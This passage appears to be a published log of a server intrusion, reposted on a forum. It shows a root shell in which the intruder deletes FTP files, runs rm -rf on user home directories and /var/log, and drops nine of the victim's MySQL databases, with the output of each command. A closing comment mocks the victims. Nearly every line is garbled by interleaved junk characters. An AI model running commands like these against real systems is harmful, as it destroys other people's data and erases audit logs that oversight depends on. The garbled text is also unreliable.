[snip]$ v) v5 s( S! H
226 Transfer complete./ X" @% |( K- i; [* C$ l, c& [
ftp> mdelete *' v. A5 ?* L) m" P6 U. _3 y' R
ftp> ls -la
+ d Y1 S5 `; I& ?7 Z227 Entering Passive Mode (212,254,194,163,2,193)/ O# u4 @. T! V0 z" U
150 Opening BINARY mode data connection for ‘file list’.2 w# s: G ~9 Z) U
226 Transfer complete.
) p7 E. }% X% Y, L) uftp>* G* W8 @ V j3 p( k: y: }- [
9 \0 H( K& z7 f4 F/ hsh-3.2# cd /home3 O$ E7 ?, y+ J9 R
sh-3.2# ls -la, X. ]% d* \% Z0 _+ X; w0 J L
total 120+ U. ^8 l2 x. ]+ ~7 c
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .* D* N i9 N; L8 P5 M
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
c; E1 P3 M7 Z# g9 e5 bdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin4 o7 y$ F3 n( S/ y/ V% P
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group0 `) I5 b% n' d; f5 E
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
p, ?4 b. p0 p- f }drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
" k4 j4 z- t1 O1 F- r! Edrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
, }& i; r: M- y6 Fdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
6 Q. g4 ]. |- qdrwx–x–x 10 com com 4096 Apr 28 12:40 com
- W! `: M1 k8 e( V9 p" pdrwxr-xr-x 2 root root 4096 May 17 2007 ftp8 @/ I+ x& L( B: D$ M d
drwx—— 3 jon jon 4096 Sep 21 2007 jon
5 ?9 y0 o' P. Gdrwx—— 2 root root 16384 Sep 11 2007 lost+found. G# b& V3 o2 L$ v R, w
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
) A" n8 T( X9 b/ q" ?. d- {drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
/ e* c, ?% A5 Q, }0 J8 Rdrwx—— 2 jon jon 4096 Sep 15 2007 test; w E9 z* Z1 a0 f
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
! D. n' Z! h! j. Q7 q( h3 Q$ t, G$ y' u
sh-3.2# rm -rf backup/' w+ ?- O, J3 ]
sh-3.2# rm -rf backup.14161/
6 n' m% U& q$ Hsh-3.2# rm -rf ftp/
( w# D y8 w! p' ^* ]' x: fsh-3.2# rm -rf jon/: r* J& i# D) n7 m: j: [
sh-3.2# rm -rf my/( [! ^& Q: [9 `3 t) {5 g8 p
sh-3.2# rm -rf mysqldata/
) I$ ]( x' W: G8 f8 Csh-3.2# rm -rf test/9 b3 T5 ^7 l6 U6 O: G! ]
sh-3.2# rm -rf tmp/
k& @5 E i F; @+ `6 \7 Y6 esh-3.2# cd ~- p1 T2 i$ k. R
sh-3.2# rm -rf *9 b# X: e X1 L
sh-3.2# rm -rf /var/log/2 k2 `4 S0 a% v0 R" i. J
rm: cannot remove directory `/var/log//proftpd’: Directory not empty; `. q/ `8 m' P1 J/ |" p. S
sh-3.2# rm -rf /home/*3 O, ^# w+ L0 E* A8 }, t
sh-3.2# mysql) m2 J3 ~3 j; U3 C
Welcome to the MySQL monitor. Commands end with ; or \g.$ g! J5 Y, G6 _
Your MySQL connection id is 407156
' S4 n* x9 p8 C4 \; }* x0 XServer version: 5.0.45-community-log MySQL Community Edition (GPL)
9 [2 a& Z; y" p; h9 N! _! d" b+ p, r! d m8 E/ @' g
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.& ]3 Q3 d$ y) D3 s1 W
5 B4 V f8 y, g' R
mysql> show databases;% r; Z4 i4 L6 z+ ^
+———————–+
( x" u$ M$ w9 L w n( B! J, P0 S| Database |! q c% R/ K$ q' g
+———————–+ [5 u, b( h- m- X( E: y' c
| information_schema |* _- c$ u! W) i
| astanet_ads |3 T3 q7 X: ~* H/ w8 \0 C% r' W, d
| astanet_mailing_lists |
- O, F$ G% R! M( x$ `% ~| astanet_mediawiki |2 X: A' Y9 Y% q! Z5 X5 j# K& D
| astanet_membersystem |! K# J3 h* D3 _
| com_contrexx |
- M* C- K2 r; ]% O' n, ^| com_contrexx2 |8 e, Q6 {3 r9 T! Q) }# P7 N3 y
| com_contrexx2_live |4 A% r' _ j# L5 Z
| da_roundcube |
% Y5 p) w) j( R) I9 v1 ^9 Q| dolphin |
+ o1 z! N1 i# W/ d3 ?- H& Q. K| ideapool |
6 b# Q9 k$ A: n( W* x/ a& `0 F+ j5 M| mysql |/ w% l6 s8 N8 G- i
| test |
" g% v+ @ R5 ^* N# m| yourmaster |- s% P! f" m+ u: E1 t, x! a
+———————–+/ E6 b E+ h' V% n. [
14 rows in set (0.03 sec)
; t4 u& R. P: I# x% j# d& T$ _/ |# w7 J* u# V5 R' e* h! \
mysql> drop database astanet_membersystem;* Z" R4 I+ s( S, p/ t( [: M. Y7 @
droQuery OK, 46 rows affected (0.81 sec)% ~1 G9 J, t( P! {1 h2 Q7 D
, ^, x1 z! W% Xmysql> drop database com_contrexx;* P7 [, l) _ t- d$ e* q2 L; E
Query OK, 211 rows affected (2.72 sec)% B+ D9 s0 P" x( X8 X: ^
! C8 ]4 {- A- f- c3 @& M3 ]/ D+ }mysql> drop database com_contrexx2;7 [/ F/ S% w8 d) o9 q6 Q
Query OK, 237 rows affected (2.23 sec)
( R" i! j/ y6 y) D$ z$ h5 H: F$ r' A& C( e9 H; r
mysql> drop database com_contrexx2_live;5 N' c$ ?7 W- e3 B; v. N
Query OK, 227 rows affected (7.63 sec)
% R$ ?# I/ M( z0 W+ N/ r$ L3 s, L* B0 k6 ]: Y" @
mysql> drop database ideapool;1 C" r/ _7 p( c
Query OK, 69 rows affected (0.19 sec)' A) l% F% d6 }! v/ x
( P. E$ Y' ]7 |: ^: \: c
mysql> drop database yourmaster;
8 m& F$ p: N1 E" A, \& h& X+ dQuery OK, 158 rows affected (0.55 sec)
4 e; O0 O! `( [5 [5 P
9 a* @! _' C) n1 v) J9 Qmysql> drop database astanet_ads;8 F% V! J, @$ b; K0 [1 ~9 h9 v/ J* Q
Query OK, 9 rows affected (0.11 sec)# c( \: }; I& P1 _
D0 d6 y6 t/ [& pmysql> drop database astanet_mailing_lists;( e* ~- m1 O" }
Query OK, 24 rows affected (1.47 sec)
3 y5 o4 w# B5 A( M- l4 _) K$ l
& ?" v& \3 @& _/ a2 b# Q" Omysql> drop database astanet_mediawiki;
* G# C8 S2 C0 ~( S) N# dQuery OK, 31 rows affected (0.51 sec)& {$ S5 g2 Y4 ?" Q, i* a9 L
4 f: D9 R" _( u
mysql> show databases;
7 H4 p; G9 K0 X+——————–+
! z3 M$ A; e$ b| Database |7 X% G9 {9 F ?0 _
+——————–+6 U9 o8 H" ~' G4 N: J
| information_schema |! y" v" x$ A4 q8 y5 ^
| da_roundcube |" `5 [* x3 y4 K D* L3 P3 h: ^/ |3 f
| dolphin |
- H, t! G% P' j* A* \9 d' B| mysql |
' k7 X2 r! t1 } O3 S( K# ]% z| test |
% `! Z( l& T4 }8 b+——————–+
6 q# G' y1 U9 N5 rows in set (0.00 sec)
5 d Q. B" L, T5 x+ _7 P- q* n& U! J$ `( r2 x% E5 o
What a journey! We’re not sure exactly why the “Terminator” had any influence on
$ M- Q. e3 Z) I/ g. H4 Ctheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the" y8 Q' t1 g# M: ]: ?
wrong to say this pack of morons *wont be back*.
( D. k7 I i! g8 w% g |
发表于 2012-11-6 21:07:34
收藏
支持
反对